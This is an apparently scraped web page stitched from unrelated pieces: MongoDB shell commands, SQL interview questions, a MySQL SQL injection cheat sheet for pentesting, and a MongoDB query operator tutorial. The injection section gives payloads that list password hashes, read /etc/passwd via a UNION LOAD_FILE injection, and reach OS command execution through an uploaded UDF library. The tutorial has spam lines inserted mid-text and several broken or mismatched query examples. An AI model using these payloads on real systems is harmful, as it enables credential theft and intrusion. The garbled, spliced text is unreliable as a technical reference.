MongoDB Cheat Sheet Show All Databases show dbs Show Current Database db Create Or Switch Database use acme Drop db.dropDatabase Create Collection db.createCollection('posts') Show Collections show collections Insert Row. Question: What is SQL injection? Answer: SQL injection is a code injection technique used to hack data-driven applications. Question: What are views, and why are they used? Answer: SQL views are virtual tables created from one or more tables. Views are a subset of data; hence, it can limit the degree of exposure of data from the tables. Some useful syntax reminders for SQL Injection into MySQL databases This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend.
- Mongodb Injection Attacks
- Mongodb Sql Injection Cheat Sheet
- Mongodb Sql Injection
- Mongodb Cheat Sheet Pdf
Some useful syntax reminders for SQL Injection into MySQL databases…
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.
The complete list of SQL Injection Cheat Sheets I’m working is:
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query.
| Version | SELECT @@version |
| Comments | SELECT 1; #comment SELECT /*comment*/1; |
| Current User | SELECT user(); SELECT system_user(); |
| List Users | SELECT user FROM mysql.user; — priv |
| List Password Hashes | SELECT host, user, password FROM mysql.user; — priv |
| Password Cracker | John the Ripper will crack MySQL password hashes. |
| List Privileges | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns |
| List DBA Accounts | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv |
| Current Database | SELECT database() |
| List Databases | SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0 SELECT distinct(db) FROM mysql.db — priv |
| List Columns | SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ |
| List Tables | SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ |
| Find Tables From Column Name | SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’ |
| Select Nth Row | SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0 SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0 |
| Select Nth Char | SELECT substr(‘abcd’, 3, 1); # returns c |
| Bitwise AND | SELECT 6 & 2; # returns 2 SELECT 6 & 1; # returns 0 |
| ASCII Value -> Char | SELECT char(65); # returns A |
| Char -> ASCII Value | SELECT ascii(‘A’); # returns 65 |
| Casting | SELECT cast(’1′ AS unsigned integer); SELECT cast(’123′ AS char); |
| String Concatenation | SELECT CONCAT(‘A’,'B’); #returns AB SELECT CONCAT(‘A’,'B’,'C’); # returns ABC |
| If Statement | SELECT if(1=1,’foo’,'bar’); — returns ‘foo’ |
| Case Statement | SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A |
| Avoiding Quotes | SELECT 0×414243; # returns ABC |
| Time Delay | SELECT BENCHMARK(1000000,MD5(‘A’)); SELECT SLEEP(5); # >= 5.0.12 |
| Make DNS Requests | Impossible? |
| Command Execution | If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform. |
| Local File Access | …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files. SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system |
| Hostname, IP Address | SELECT @@hostname; |
| Create Users | CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv |
| Delete Users | DROP USER test1; — priv |
| Make User DBA | GRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv |
| Location of DB files | SELECT @@datadir; |
| Default/System Databases | information_schema (>= mysql 5.0) mysql |
Thanks
Jonathan Turner for @@hostname tip.
Tags: cheatsheet, database, mysql, pentest, sqlinjection
Posted in SQL Injection
/Title: MongoDB Query Operator Cheat SheetMeta Description: This MongoDB query operator cheat sheet provides a quick coding reference.Meta Keywords: MongoDB Query OperatorAuthor: orkbTemplate: Unstructured TutorialCategories: MongoDBTags: MongoDB, MongoDB query operator cheat sheetStatus:ID: 247/
Introduction
The MongoDB document database is a receptive repository for many documents. You want to find results that match your customized search criteria. One main key to accomplishing this task successfully is to use the appropriate query operator. With this MongoDB query operator cheat sheet, you’ll be able to do just that in record time.
Comparison Query Operators
Some MongoDB query operators help you to search documents that omit certain values.
An example is shown here where the
$ninoperator that returns documents in a collection called family. The documents have an age field. In that field, any age but 2 or 8 will be returned in the results. If any document doesn’t have an age field, it will be returned as well.
| Name | Description | Usage |
|:—–|:————|:—–:|
|$nin | Matches none of the values specified in an array.| db.family.find( { age: { $nin: [ 2, 8 ] } } )
- The
$neoperator shown in the example below returns different documents in the same family collection. The values it will omit are those that are female in the gender field. Use $ne when you want to search results that find all but those documents that are without a particular value you specify.
db.family.find( { gender: { $ne: 'female' } } )
- In this example, the
$lteoperator will return results that have values of 17 or less found in the age field.
db.family.find( { age: { $lte: 17 } } )
- The
$inoperator will look for equal values that match anything you specify in an array.
{ field: { $in: [<value1>, <value2>, .. <valuen> ] } }
- The
$eqoperator match returns results that are exactly the same as the value you specify.
{ <field>: { $eq: <value> } }
The
$gteoperator searches for values greater than a value that is specified.Drivers abilis sound cards & media devices. The example here shows the family collection as the database where documents in the gender field with a value or 7 or more are searched.
db.family.find( { gender: { $gt: 7 } } )
Array Query Operators
The
$elemMatchoperator returns documents if values match all specified conditions.The example below
find()operator looks for documents operation queries for documents where the value of the gender field is female.$elemMatchprojection returns only the first matching element of the child array where the complexion field is fair.|
| Name | Description | Usage |
|:—–|:————|:—–:|
| $elemMatch | Returns a document if an element within the array field matches all of the $elemMatch conditions. | db.family.find( { gender: “”female”” }, { child: { $elemMatch: { complexion: “”fair”” } } } )
- The operator
$allreturns documents that match all the elements in an array of a specified field.
{ <field>: { $all: [ <value1> , <value2> .. ] } }
The
$sizeoperator argument must return all documents specified by an array, so it must find the solution to the array. It matches all elements within a range.This example shows the family collection where there are 2 elements in the query operator argument
$size.
db.family.find( { field: { $size: 2 } } );
Logical Query Operators
The
$notquery operator selects documents that are not a particular value that is specified in the query. Use this query operator when you want to find all but a particular value.An example below shows the use of the
$notquery to return certain documents in the family collection. The specified field is the age field and it should be a value of 15 or less than that. If a document doesn’t have an age field, it will also be placed in the search results.
| Name | Description | Usage |
|:—–|:————|:—–:|
| $not | Returns documents that don’t match the query expression.| db.family.find( { age: { $not: { $gt: 15 } } } )
- The
$norquery operator returns documents that fail all expressions in an array.|{ $nor: [ { <expression1> }, { <expression2> }, .. { <expressionn> } ] }|
The
$andquery operator adds consecutive query clauses and returns documents that meet all the clauses criteria.This example shows the
$andoperator and two clauses. All of documents will return that meet the entire criteria specified by the two clauses. A document that matches one but not the other clause will not be returned. Here, the seach is for the family collection. The age field has two clauses for documents to match:
(1) not equal to 5 and (2) the age field exists
db.family.find( { $and: [ { age: { $ne: 5 } }, { age: { $exists: true } } ] } )
The
$orquery returns documents that match one or more clauses.The example shown queries the famiy collection. The age field of a document can either have a field value of 7 or less OR the complexion field value of “fair.”
|db.family.find( { $or: [ { age: { $lt: 7 } }, { complexion: 'fair' } ] } )
Evaluation Query Operators
- The
$wherequery operator This command will return documents from family collection where first name is equal to Yeshua.|
| Name | Description | Usage |
|:—–|:————|:—–|
|$where | Returns documents that match a JavaScript expression. | db.family.find( { $where: function() { return (this.name.first 'Yeshua') }}).pretty()
The
$regexquery operator returns documents the match the stated expression.The example shown here returns documents where the first name has a value of “R.” The family collection is queried.
db.family.find( { ''name.first': { $regex: 'R.*' } } )
Mongodb Injection Attacks
The
$exprgrants usage of expressions use of gathering of expressions within the query language.The below example shows
$exprthe operator query to return documents where the number of finished aricles is more than the monthly article quota.
db.articleMonthly.find( { $expr: { $gt: [ '$articleFinished' , '$articleQuota' ] } } )
- The
$textquery operator runs a text search for fields in a text index. The string should look like this:
{
$text:
{
$search: <string>,
$language: <string>,
$caseSensitive: <boolean>,
$diacriticSensitive: <boolean>
Mongodb Sql Injection Cheat Sheet
}
}
- The
$searchstring queries the text index in the MongoDB database.
- The
$languageargument is optional. It determines the searchs stop words list. You can select “None” for stop words and it will return documents that match the conditions of the string query.
Mongodb Sql Injection
- The
$caseSensitiveboolean flag is optional. Use it to disable or enable case sensitivity in a text index search. The default selection is case insensitivity, that is, the default is irrespective of case.
- The
$diacriticSensitiveboolean flag is optional in version 3 text indexes. Use it to disable or enable diacritic marks or signs in a text index search. Earlier versions automatically default to diacritic insensitivity.
The
$mod(modulo) query operator is used to return documents that match an indicated$modexpression. The syntax shows the specified remainder of a field’s given value. That value was divided by a number (divisor)The
$modhas changed starting with the 2.6 version. It passes an error when the remainder is fewer or more than the specified remainder in the array. Earlier versions didn’t pass an error when a remainder is zero.Here’s an example where documents will be returned from the family colllection. The age field
$modis 7, the specified remainder is 0.
db.family.find( { age: { $mod: [ 7, 0 ] } } )
Element Query Operators
The
$existsoperator returns documents that match all of the criteria indicated in the value field.The example below shows that in the family collection, documents will be returned REVIEW THIS PART ONLY
will documents in the family collection where the age field exists and its value does not equal 5 or 15.|
| Name | Description | Usage |
|:—–|:————|:—–|
|$exists| Matches documents that contain the indicated values.|db.family.find( { age: { $exists: true, $nin: [ 3, 21 ] } } )
The
$typeoperator returns documents that are of a certain BSON type(3). An instance of that type is the field’s value, and this is what documents must match in order to be returned in the search results.Download kyohritsu electronic industry driver. The query below is an example of the
$typeoperator that returns documents that match the BSON types in the order given by type.
{ field: { $type: [ <bson type1='type1'> , <bson type2='type2'>, .. ] } }
Conclusion
Mongodb Cheat Sheet Pdf
The MongoDB database query operator cheat sheet is an excellent resource for beginners and experts alike. It contains comparison, array, logical, evaluation, element and more commonly used query operators. Refer to it often. Think of the cheat sheet as your helpmate for efficient coding in all of your MongoDB projects.